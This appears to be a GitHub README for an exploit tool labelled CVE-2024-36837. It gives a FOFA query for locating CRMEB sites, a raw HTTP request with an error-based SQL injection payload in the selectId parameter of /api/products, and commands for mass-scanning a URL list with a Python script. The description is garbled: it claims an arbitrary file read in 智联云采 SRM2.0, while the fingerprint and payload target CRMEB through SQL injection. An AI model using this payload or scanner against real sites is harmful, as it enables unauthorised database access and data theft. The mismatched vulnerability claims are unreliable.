Skip to content

Latest commit

 

History

History
31 lines (24 loc) · 1.01 KB

README.md

File metadata and controls

31 lines (24 loc) · 1.01 KB

README.md

#CVE-2024-36837

Disclaimer

#智联云采 SRM2.0 runtimeLog/download 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

fofa语法: body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"

#POC:

GET /api/products?limit=20&priceOrder&salesOrder&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(9753165)))),0x7e),3550) HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15 Connection: close Accept: / Accept-Language: en Accept-Encoding: gzip #将url的url前添加http://或https:// python 11.py

#how to use python cve.py -h

#批量检测 url.txt 的url地址要http://或https:// python cve.py -f url.txt

#单个检测 url地址要http://或https:// python cve.py -u url